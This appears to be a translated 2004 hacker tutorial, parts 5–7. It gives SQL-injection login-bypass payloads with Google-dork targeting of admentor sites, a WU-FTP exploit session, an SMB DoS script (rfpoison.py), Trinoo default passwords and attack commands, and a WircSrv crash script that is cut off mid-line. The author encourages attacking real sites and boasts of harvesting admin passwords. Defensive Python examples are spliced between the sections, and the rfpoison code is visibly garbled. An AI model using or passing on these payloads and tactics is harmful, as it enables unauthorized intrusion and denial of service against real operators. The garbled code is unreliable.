_ The cp, mv, rm commands: copy, move, delete files
Example with rm (del): $ rm -rf /var/tmp/blah --> deletes the file blah.
cp and mv work the same way.
_ The find command: search for files and directories
Example: $ find / -user level2
_ The grep command: a search tool; the simplest usage: grep "something"
Example: $ ps axuw | grep "level1"
_ The strings command: prints all the printable characters in a file. Use it to find string declarations in a program, or system calls, and sometimes even a password
Example: $ strings /usr/bin/level1
_ The strace command: (linux) traces system calls and signals; very handy for following a program's flow, the fastest way to find where a program breaks. On other unix systems the equivalent tools are truss and ktrace.
Example: $ strace /usr/bin/level1
_ The cat, more commands: print a file's contents to the screen

$ cat /etc/passwd | more --> prints the passwd file the fastest way.
$ more /etc/passwd --> prints the passwd file slowly, a page at a time.

_ The hexdump command: prints the ascii, hex, octal and decimal values of the input data.
Example: $ echo AAAA | hexdump
_ The cc, gcc, make, gdb commands: compilers and debuggers.
Example: $ gcc -g -o bof bof.c
Example: $ make bof
Example: $ gdb level1
(gdb) break main
(gdb) run
_ The perl command: a language
Example: $ perl -e 'print "A"x1024' | ./bufferoverflow (buffer overflow when we feed in 1024 characters)
_ The "bash" command: automate your tasks with shell scripts; powerful and flexible.
To learn about bash and see what it is like:
$ man bash
_ The ls command: view a directory's contents (list the files in a directory).
Example: $ ls /home --> shows all the files in the home directory
$ ls -a --> shows all files, including hidden ones
$ ls -l --> shows details about the files
_ Writing output to a file:
Example: $ ls /usr/bin > ~/convoi --> writes the listing of the bin directory to the file convoi.

34.) Basic knowledge around Linux:

a.) Some important directories on a server:

_ /home: where users' files are kept (e.g. a user who logs into the system as convit has a directory /home/convit)
_ /bin: where the basic, essential Unix commands such as ls live.
_ /usr/bin: where the other special commands live, commands used by special users and for system administration.
_ /boot: where the kernel and the other files used at boot live.
_ /etc: configuration files for the network, NFS (Network File System), mail (this is the key place we need to exploit the most)
_ /var: administrative files
_ /usr/lib: standard libraries such as libc.a
_ /usr/src: where program sources live.

b.) Location of the passwd file on various versions:

CODE
AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *


35.) Exploiting Linux through the security hole in the WU-FTP server:

_ WU-FTP Server (developed by Washington University) is FTP server software used quite widely on Unix & Linux systems (all the distributors: Redhat, Caldera, Slackware, Suse, Mandrake....) and on Windows too....; hackers can execute their own commands remotely through file globbing, by overwriting a file on the system.
_ However, exploiting this bug is not easy, because the following conditions must be met:
+ You must have an account on the server.
+ You must be able to place shellcode in the server process's memory.
+ You must send a special FTP command containing a special globbing pattern without the server detecting the error.
+ The hacker then overwrites a function with a pointer to the shellcode, which may then be executed by the FTP server itself.
_ Let's analyse the following example of overwriting in the FTP server:

CODE
ftp> open localhost <== command to open the vulnerable site.
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== connected to the FTP server.
Name (localhost:root): anonymous <== enter the name here
331 Guest login ok, send your complete e-mail address as password.
Password:.. <== enter the password here
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== using binary mode to transfer files.
ftp> ls ~{ <== command listing the current directory.
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21 <== accepting connections on port 21.
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) attach 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== exploiting the wu.ftpd bug.
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c


My own tests of this exploit have not succeeded so far (no idea where I am going wrong). So whoever manages it, please post it for the rest of us.
Linux bugs are very rare now (especially on Redhat); wait, and if any new bug turns up the Security Bugs board will post it right away. As for how to exploit them, ask the Mod in charge of that board, especially Leonhart; he is very diligent about answering you.

(Based on an article by brother Binhnx2000)

36.) About SQL Injection:

_ SQL Injection is one of the web hacking techniques that is becoming popular today. By injecting SQL query/command code into the input before it is passed to the web application for processing, you can log in without a username and password, execute commands remotely, take the data and get root on the SQL server. The attack tool is any web browser, such as Internet Explorer, Netscape, Lynx, ...
_ You can find vulnerable Web sites by using the search engines to look for pages that let you submit data. Some Web pages pass parameters through hidden fields, so you have to view the source to see them. E.g. we can tell that this page submits data by looking at the code when we view source:

CODE
<input type=hidden name=A value=C>

_ Check whether the Web page has this bug by entering the following login and pass, one after the other:

- Login: hi' or 1=1--
- Pass: hi' or 1=1--

If that does not work, keep trying with these logins and passes:

CODE
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

If it succeeds, you can log in without knowing the username and password. This bug concerns queries, so anyone who has studied databases can exploit it easily just by typing query commands into the browser. If you want to learn more about this bug, look for the articles by the vicky group.

37.) An example of hacking a Web site through the admentor bug (a form of SQL Injection):

_ First go to google.com and search for admentor Web sites with the keyword allinurl: admentor.
_ You will usually get results like this:

http://www.someserver.com/admentor/admin/admin.asp

_ Try entering ' or ''=' as the login and password:

CODE
Login: ' or ''='
Password: ' or ''='


_ If it succeeds, you enter the vulnerable Web site as admin.
_ Now let's see how this bug is fixed:
+ Filter out special characters such as ' " ~ \ by inserting the following javascript code:

CODE
function RemoveBad(strTemp)
{
    strTemp = strTemp.replace(/\<|\>|\"|\'|\%|\;|\(|\)|\&|\+|\-/g, "");
    return strTemp;
}

+ And call it from inside the asp script:

CODE
var login = RemoveBad(Request.QueryString("login"));
var password = RemoveBad(Request.QueryString("password"));


- And the bug is fixed.
- You can apply this hacking method to other Web sites that submit data; go and test it, Vietnamese Web sites have this bug a lot, I have collected quite a few admin passes this way (but I also told them to fix the bug).
- Many sites cannot be logged into with ' or ''= but only with real nicknames registered on the site; go to the members link, find an admin's nick and test with that.
Happy hacking.
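The payloads listed in 36.) and 37.) against a login query built two ways, as an added example that is not part of the original article: string concatenation lets the tautology rewrite the WHERE clause, while a parameterized query (the robust fix, which the RemoveBad() character blacklist only approximates) compares the same input as a plain string. The users table and its single row are constructed here; sqlite3 is used only because it ships with Python.

```python
import sqlite3

# The probe strings from sections 36 and 37 of the article.
PAYLOADS = [
    "' or 1=1--",
    '" or 1=1--',
    "or 1=1--",
    "' or 'a'='a",
    '" or "a"="a',
    "') or ('a'='a",
    "' or ''='",
]


def make_db():
    """In-memory database with one constructed account (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def login_concat(conn, login, password):
    """Vulnerable: the form values are pasted into the SQL text, so a quote
    in the input closes the string literal and the rest is parsed as SQL."""
    sql = ("SELECT login FROM users WHERE login = '%s' AND password = '%s'"
           % (login, password))
    return conn.execute(sql).fetchone() is not None


def login_param(conn, login, password):
    """Fixed: placeholders. The driver passes the values separately from the
    SQL text, so the input is compared as data and cannot add OR/-- clauses;
    no character blacklist is needed for this to hold."""
    sql = "SELECT login FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (login, password)).fetchone() is not None


def probe(conn, login_fn):
    """Try each payload as both login and password. 'error' marks payloads
    that only break the query's syntax, which is still a finding: the error
    shows that form input reaches the SQL parser unescaped."""
    results = {}
    for p in PAYLOADS:
        try:
            results[p] = login_fn(conn, p, p)
        except sqlite3.Error:
            results[p] = "error"
    return results


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", login_concat), ("parameterized", login_param)):
        print(name)
        for payload, outcome in probe(db, fn).items():
            print("  %-16r -> %s" % (payload, outcome))
```

Running it shows three of the seven payloads logging in as admin against the concatenated query, one raising a syntax error, and none succeeding against the parameterized query.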


In part 6 I will cover the denial of service attack (DoS attack), a dangerous attack that made a strong site like our HVA choke for a short while when the admins had all gone out for coffee and nobody was watching. Along with it, the DoS attack methods that have been and are being used.

GOOD LUCK!!!!!!!!!!!!!!!!!!!!
The most basic things to know to become a Hacker - Part 6 [12/22/2004 10:04:00 AM]

38.) What is a DoS attack? (Denial Of Services Attack)

A DoS attack (translated: denial of service attack) is a very dangerous kind of attack; with this kind of attack you only need one computer connected to the Internet to attack the opponent's computer. The essence of a DoS attack is that the hacker occupies a large amount of the server's resources (the resources can be bandwidth, memory, cpu, disk, ...) so that the server can no longer answer requests from other people's machines (the machines of normal users), and the server may quickly stop working, crash or reboot.


39.) The kinds of DoS attack known and in use today:

a.) Winnuke:

_ This kind of DoS attack only works on computers running Windows 9x. The hacker sends packets with "Out of Band" data to port 139 of the target (port 139 is the NetBIOS port, which only accepts packets with the Out of Band flag set). When the victim's computer receives these packets, a blue screen error is shown to the victim, because Windows received the packets but does not know how to react to Out Of Band data, so the system crashes.

b.) Ping of Death:

_ In this kind of DoS attack, we just send one very large data packet with the ping command to the target machine and their system hangs.
_ Example: ping -l 65000

c.) Teardrop:

_ As we know, all data moving over the network from the source system to the destination system goes through 2 processes: the data is split into small fragments at the source, each fragment carrying an offset value that determines its position within the data packet being transferred. When these fragments arrive at the destination, the destination system uses the offset values to put the fragments back together in the original order.
Exploiting this, we only need to send the destination a series of packets whose offset values overlap one another. The destination cannot reassemble these packets; it loses control and may crash, reboot or stop working if the number of packets with overlapping offsets is large enough!

d.) SYN Attack:

_ In a SYN Attack, the hacker sends the target a series of SYN packets with non-existent source ip addresses. When the target receives these SYN packets it replies to the non-existent addresses and waits for the responses from the fake ip addresses. Because those ip addresses do not exist, the target keeps waiting and has to hold these pending "requests" in memory, wasting a significant amount of memory on the server that should be used for other work instead of waiting for responses that never come. If we send many packets with spoofed IP addresses at once, the system is overloaded and crashes or reboots. ==> and that's that.

e.) Land Attack:

_ A Land Attack is much like a SYN Attack, but instead of non-existent ip addresses the hacker uses the victim system's own ip address. This creates an endless loop inside the victim system itself, between one side that needs a reply and another side that can never send one. ==> Total congestion.
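The header fields the descriptions in 31.), 39.c) and 39.e) rely on, as an added example that is not part of the original article: a minimal IPv4 header parser, the overlap check a reassembly routine or IDS applies against the Teardrop pattern, and the source-equals-destination check that identifies a Land packet. The packets, addresses and identifiers are constructed here with struct (the checksum is left at zero since nothing verifies it).

```python
import struct
from socket import inet_aton, inet_ntoa

IPV4 = struct.Struct("!BBHHHBBH4s4s")   # fixed 20-byte header, no options
MF = 0x2000                             # "more fragments" flag bit


def build_packet(src, dst, ident, offset, payload, more=False, proto=17):
    """Construct an IPv4 datagram for the demonstration. offset is in bytes
    and must be a multiple of 8 because the wire format stores it in 8-byte
    units. Any src string is accepted: the source address is just a field the
    sender fills in, which is all that the spoofing described in 31.) needs."""
    if offset % 8:
        raise ValueError("fragment offset must be a multiple of 8")
    flags_frag = (MF if more else 0) | (offset // 8)
    hdr = IPV4.pack(0x45, 0, 20 + len(payload), ident, flags_frag,
                    64, proto, 0, inet_aton(src), inet_aton(dst))
    return hdr + payload


def parse_packet(pkt):
    """Decode the fixed header; offset is returned in bytes."""
    (ver_ihl, _tos, total_len, ident, ff, _ttl, proto,
     _csum, src, dst) = IPV4.unpack_from(pkt)
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "src": inet_ntoa(src), "dst": inet_ntoa(dst), "ident": ident,
        "proto": proto, "more": bool(ff & MF), "offset": (ff & 0x1FFF) * 8,
        "payload": pkt[ihl:total_len],
    }


def is_land(pkt):
    """Land pattern: a packet whose source address is its own destination.
    Such a datagram cannot legitimately arrive from the network, so a border
    filter can drop it outright."""
    p = parse_packet(pkt)
    return p["src"] == p["dst"]


def reassembly_verdict(fragments):
    """Check one datagram's fragments (same src/dst/ident) before reassembly.
    Returns 'ok', 'overlap' (Teardrop: a fragment starts before the previous
    one ends) or 'gap' (bytes missing or last fragment never seen)."""
    parsed = sorted((parse_packet(f) for f in fragments),
                    key=lambda p: p["offset"])
    expected = 0
    for p in parsed:
        if p["offset"] < expected:
            return "overlap"
        if p["offset"] > expected:
            return "gap"
        expected = p["offset"] + len(p["payload"])
    if parsed and parsed[-1]["more"]:
        return "gap"
    return "ok"


def demo():
    """Constructed traffic: a clean two-fragment datagram, a Teardrop pair
    whose second fragment starts inside the first, a Land packet, and a
    packet whose source field was simply written as 1.2.3.4."""
    normal = [build_packet("10.0.0.2", "10.0.0.9", 1, 0, b"A" * 16, more=True),
              build_packet("10.0.0.2", "10.0.0.9", 1, 16, b"B" * 8)]
    teardrop = [build_packet("10.0.0.2", "10.0.0.9", 2, 0, b"A" * 24, more=True),
                build_packet("10.0.0.2", "10.0.0.9", 2, 16, b"B" * 8)]
    land = build_packet("10.0.0.9", "10.0.0.9", 3, 0, b"S", proto=6)
    spoofed = build_packet("1.2.3.4", "10.0.0.9", 4, 0, b"")
    return {"normal": reassembly_verdict(normal),
            "teardrop": reassembly_verdict(teardrop),
            "land": is_land(land),
            "spoofed_src": parse_packet(spoofed)["src"]}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "->", verdict)
```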

f.) Smurf Attack:

_ A Smurf Attack needs three parties: the hacker (who orders the attack), the amplifier network (which obeys the hacker) and the victim's system. The hacker sends ICMP packets to the broadcast address of the amplifier network. The special thing is that these ICMP packets carry the victim's ip as their source ip address. When the packets reach the broadcast address of the amplifier network, the computers in that network believe the victim sent them ICMP packets and all reply to the victim at once with ICMP response packets. The victim's system cannot cope with the huge volume of these packets and quickly stops working, crashes or reboots. So by sending only a small number of ICMP packets, the amplifier network multiplies the ICMP traffic many times over. The amplification ratio depends on the number of computers in the amplifier network. The hacker's job is to take over as many networks or routers as possible that forward packets straight to the broadcast address without filtering the source address at their outputs. With these systems in hand, the hacker can easily run a Smurf Attack against the systems they want to attack. ==> one machine makes a thousand tremble; a slow machine gives up first.

g.) UDP Flooding:

_ The UDP attack needs 2 systems to take part. The hacker makes their own system enter a loop exchanging data over the UDP protocol, spoofing the packets' source ip address as the loopback address (127.0.0.1), and sends these packets to the victim's system on the UDP echo port (7). The victim's system replies to the messages "sent" by 127.0.0.1 (itself), and the result is an endless loop. However, many systems refuse the loopback address, so the hacker spoofs the ip address of some computer on the victim's network instead and floods the victim's system with UDP. If this fails, it is your own machine that gets flooded.

h.) DNS attack:

_ The hacker can poison an entry on the victim system's Domain Name Server and point it at some website of the hacker's. When a client asks the DNS to resolve the hijacked name into an ip address, the DNS (whose temporary cache the hacker altered) immediately resolves it to the ip address the hacker pointed it at. As a result, instead of the Web site they wanted, the victims land on a Web site made by the hacker. A truly effective denial of service attack!

i.) Distributed DoS Attacks (DDoS):

_ DDoS needs at least a few hackers to take part. First the hackers break into poorly secured computer networks, then install the DDoS server program on those systems. Then the hackers agree on a time, use the DDoS client to connect to the DDoS servers, and simultaneously order those DDoS servers to launch the DDoS attack on the victim's system.

j.) DRDoS (The Distributed Reflection Denial of Service Attack):

_ This is probably the most dangerous kind of attack and the quickest way to knock out the opponent's machine. The method is similar to DDoS, but instead of attacking with many machines, the attacker needs only one, attacking through the big servers of the world. Still spoofing the victim's IP address, the attacker sends packets to the strongest, fastest servers with the widest links, such as Yahoo etc.; these servers send their replies to the victim's address. Receiving so many packets through these big servers at once quickly saturates the victim's link and crashes or reboots the computer. This attack is dangerous in that a single machine with a plain, ordinary Internet connection can bring down any system with the best links in the world if we do not stop it in time. Our HVA Web site was DoSed recently by exactly this kind of attack.

40.) DoSing the Web with Python:

_ This technique can only be used against WinNT, and you need time before the victim's computer goes down.
_ Download Python from http://www.python.org/ to use it.
_ Save the following code to the file rfpoison.py.

CODE
import string
import struct
from socket import *
import sys
def a2b(s):
bytes = map(lambda x: string.atoi(x, 16),
string.split(s))
data = string.join(map(chr, bytes), ``)
return data
def b2a(s):
bytes = map(lambda x: `%.2x` % x, map(ord, s))
return string.join(bytes, ` `)

# Yu cu tp hp NBSS
nbss_session = a2b(``````
81 00 00 48 20 43 4b 46 44 45
4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43
41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45
42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46
43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00
00 00
``````)

# To SMB
crud = (
# Yu cu SMBnegprot
``````
ff 53 4d 42 72 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00
``````,
# Yu cu setup SMB X
``````
ff 53 4d 42 73 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00
``````,
# Yu cu SMBtconX
``````
ff 53 4d 42 75 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56
45 52 5c 49 50 43 24 00 49 50 43 00
``````,
# Yu cu khI to SMBnt X
``````
ff 53 4d 42 a2 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00
07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72
76 73 76 63 00
``````,
# yu cu bin dch SMB
``````
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
``````,
# SMBtrans Request
``````
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
"""
)
crud = map(a2b, crud)   # hex text -> raw bytes (a2b/b2a are the hex helpers defined earlier in the script)
def smb_send(sock, data, type=0, flags=0):
    # NetBIOS session header: type, flags, 16-bit big-endian length, then the SMB payload
    d = struct.pack('!BBH', type, flags, len(data))
    #print 'send:', b2a(d+data)
    sock.send(d+data)
def smb_recv(sock):
    # read the 4-byte session header, then exactly the payload it announces
    s = sock.recv(4)
    assert(len(s) == 4)
    type, flags, length = struct.unpack('!BBH', s)
    data = sock.recv(length)
    assert(len(data) == length)
    #print 'recv:', b2a(s+data)
    return type, flags, data
def nbss_send(sock, data):
    sock.send(data)
def nbss_recv(sock):
    s = sock.recv(4)
    assert(len(s) == 4)
    return s
def main(host, port=139):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))   # connect() takes a single (host, port) tuple
    nbss_send(s, nbss_session)
    nbss_recv(s)
    for msg in crud[:-1]:
        smb_send(s, msg)
        smb_recv(s)
    smb_send(s, crud[-1]) # no response to this
    s.close()
if __name__ == '__main__':
    print 'Sending poison...',
    main(sys.argv[1])
    print 'done.'


To actually bring down the other side's server you need time for the DoS to take effect; if you are not in a position to wait, it is best not to use this method. But is it worth poking at just to learn how it works?

41 . ) DDoS attacks through Trinoo :

_ You already know what a DDoS attack is, don't you? A Trinoo DDoS attack is carried out by the hacker connecting to a Trinoo Master and instructing the Master to launch a DDoS attack against one or more targets. The Trinoo Master then contacts the Daemons and hands them the addresses to be attacked, so that they attack one or more targets for a set period of time.
_ Both the Master and the Daemon are protected by a password; only when we know the password can we control them, which is no trouble at all if we are their real owner. These passwords are usually encrypted and can be set when compiling Trinoo from source into a binary. Once started, the Daemon shows a prompt and waits for the password; if the wrong password is entered it exits on its own, and if the right password is entered it goes on running in the background of the system.

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
kwijibo
Connection closed by foreign host. <== you entered the wrong password


attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo > <== you are in the trinoo system

_ Here are a few default passwords :

"l44adsl": password of the trinoo daemon .
"gorave": password of the trinoo master server at startup .
"betaalmostdone": the common remote-control password for the trinoo master .
"killme": password the trinoo master requires for the "mdie" command .

_ Here are some commands used to control the Master Server :


CODE
die ------------- Shutdown.
quit ------------ Log off.
mtimer N -------- Set the duration of the DoS attack, with N taking a value from 1 to 1999 seconds.
dos IP ---------- Attack a given IP address.
mdie pass ------- Disable all Broadcasts if the password is correct. A command ("d1e l44adsl") is sent to the Broadcasts to shut them down. A separate password is set for this item.
mping ----------- Send a ping command ("png l44adsl") to the Broadcasts.
mdos ------------ Send multiple DoS commands ("xyz l44adsl 123:ip1:ip2") to the Broadcasts.
info ------------ Display information about Trinoo.
msize ----------- Set the buffer size of the packets sent during the DoS.
nslookup host --- Resolve the hostname of the host the Trinoo Master is running on.
usebackup ------- Switch to the backup Broadcast file created by the killdead command.
bcast ----------- List all the Broadcasts that can be used.
help [cmd] ------ Print the list of commands.
mstop ----------- Stop the DoS attacks.


_ Here are some commands used to control the Trinoo Daemons :

CODE
aaa pass IP ------------- Attack the given IP address. Sends UDP packets to a UDP port (0-65534) of the given IP address for a set period, which defaults to 120 s or can be set from 1 to 1999 s.
bbb pass N -------------- Set the time limit for the DoS attacks.
Shi pass ---------------- Send the string *HELLO* to the list of Master Servers compiled into the program, on port 31335/UDP.
png pass ---------------- Send the string PONG to the Master Server that issued the control command, on port 31335/UDP.
die pass ---------------- Shutdown Trinoo.
rsz N ------------------- Size in bytes of the buffer used for the attack.
xyz pass 123:ip1:ip3 ---- DoS several targets at once.
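
The Master and Daemon command listings above also tell a defender what to look for on the wire: the Master is controlled over 27665/tcp and the Daemons report to it on 31335/udp. The script below is an added example (not part of the original article or of Trinoo) that runs that knowledge over a few constructed flow records and assigns each host the role its traffic implies. The flow format, the sample addresses and the 27444/udp master-to-daemon port (taken from the public Trinoo analyses, not from this page) are assumptions of the example.

```python
from collections import defaultdict

# Trinoo control channels. 27665/tcp and 31335/udp are named in the text
# above; 27444/udp (master -> daemon) is from the public Trinoo analyses.
TRINOO_CHANNELS = {
    ("tcp", 27665): "attacker -> master control session",
    ("udp", 31335): "daemon -> master (*HELLO* / PONG)",
    ("udp", 27444): "master -> daemon command",
}

# Constructed flow records: proto src sport dst dport bytes
SAMPLE_FLOWS = """\
tcp 203.0.113.5 40112 192.0.2.10 27665 812
udp 192.0.2.10 27444 198.51.100.7 27444 41
udp 198.51.100.7 51623 192.0.2.10 31335 8
tcp 203.0.113.5 40113 192.0.2.10 22 1200
udp 198.51.100.7 53 192.0.2.53 53 96
"""


def parse_flows(text):
    """Turn the constructed flow lines into dicts; blank lines are skipped."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        proto, src, sport, dst, dport, nbytes = line.split()
        flows.append({"proto": proto, "src": src, "sport": int(sport),
                      "dst": dst, "dport": int(dport), "bytes": int(nbytes)})
    return flows


def find_trinoo_flows(flows):
    """Return (src, dst, proto, dport, reason) for every flow on a Trinoo channel."""
    hits = []
    for f in flows:
        reason = TRINOO_CHANNELS.get((f["proto"], f["dport"]))
        if reason:
            hits.append((f["src"], f["dst"], f["proto"], f["dport"], reason))
    return hits


def suspected_roles(hits):
    """Map each host to the Trinoo roles its traffic implies (sorted list per host)."""
    roles = defaultdict(set)
    for src, dst, proto, dport, _ in hits:
        if (proto, dport) == ("tcp", 27665):
            roles[src].add("attacker")
            roles[dst].add("master")
        elif (proto, dport) == ("udp", 31335):
            roles[src].add("daemon")
            roles[dst].add("master")
        elif (proto, dport) == ("udp", 27444):
            roles[src].add("master")
            roles[dst].add("daemon")
    return {host: sorted(r) for host, r in roles.items()}


if __name__ == "__main__":
    found = suspected_roles(find_trinoo_flows(parse_flows(SAMPLE_FLOWS)))
    for host, r in found.items():
        print(host, ",".join(r))
```

Port matching alone is a weak signal on a busy network; the point of the role assignment is that one host showing up as "master" from two different channels (a control session in, daemon traffic in) is far more convincing than a single flow to a suspicious port.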


( Based on the guide by brother Binhnx2000 )
There is plenty more code and many more ways to apply DoS; please take the trouble to look into them further. But don't attack at random, least of all HVA's server, or you risk getting no result and having your nick locked on top of it.

End of part 6 - Anhdenday
The most basic things to know to become a Hacker - Part 7 [12/22/2004 10:10:00 AM]

42 . ) DoS attack technique against WircSrv Irc Server v5.07 :

WircSrv IRC is a popular IRC server on the Internet; it crashes if a hacker sends it a packet larger than the allowed size (65000 characters) on port 6667. You can do this by telnetting to WircSrv on port 6667:


If you use Unix:

hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is '^]'.
[buffer]

Windows is the same:

telnet irc.example.com 6667

Note: [buffer] is a data packet equivalent to 65000 characters.
However, we can crash it very simply with the following code (look at the code and work out the commands in it for yourself; that is one of the ways hackers train their reflexes while they study. Now, let's analyse it at a basic level):

CODE
#!/usr/bin/perl #<== this line tells us the script is run by perl
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
$foo = "A"; # this is the NOP
$number = "65000"; # this is the total number of NOPs
$data .= $foo x $number; # the result of $foo times $number
$serv = $args{s}; # the remote server, taken from the command line
$port = 6667; # the remote port, it defaults to 6667
$buf = "$data";
$in_addr = (gethostbyname($serv))[4]
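
The bug class the script above relies on is a server that keeps buffering a single message no matter how long it gets. The counterpart below is an added example, not from this article or from WircSrv, showing the reader a hardened server should use: a line is read with a hard byte limit (the RFC 1459 message bound of 512 bytes is assumed here) and a client that exceeds it is dropped before its data can pile up. The session transcripts are constructed inputs.

```python
import io

IRC_MAX_LINE = 512  # upper bound of an IRC message in RFC 1459, CR LF included


class LineTooLong(Exception):
    """Raised when a client sends more bytes than one message may hold."""


def read_bounded_line(stream, limit=IRC_MAX_LINE):
    """Read one line but never buffer more than `limit` bytes of it.

    Returns None at end of stream. Raises LineTooLong instead of growing the
    buffer, which is the check the vulnerable server described above lacks.
    """
    line = stream.readline(limit)
    if not line:
        return None
    if not line.endswith(b"\n") and len(line) >= limit:
        raise LineTooLong(limit)
    return line


def handle_session(raw):
    """Feed a whole client transcript (bytes) through the bounded reader.

    Returns (accepted_lines, outcome): accepted lines are decoded and stripped;
    the outcome says whether the session ended normally or was dropped.
    """
    stream = io.BytesIO(raw)
    accepted = []
    while True:
        try:
            line = read_bounded_line(stream)
        except LineTooLong:
            return accepted, "dropped: line exceeds %d bytes" % IRC_MAX_LINE
        if line is None:
            return accepted, "closed normally"
        accepted.append(line.rstrip(b"\r\n").decode("utf-8", "replace"))


# Constructed inputs: a normal registration, and a 65000-byte line like the
# one the text above says crashes the server.
NORMAL_SESSION = b"NICK alice\r\nUSER alice 0 * :Alice\r\n"
FLOOD_SESSION = b"NICK alice\r\n" + b"A" * 65000 + b"\r\n"

if __name__ == "__main__":
    print(handle_session(NORMAL_SESSION))
    print(handle_session(FLOOD_SESSION))
```

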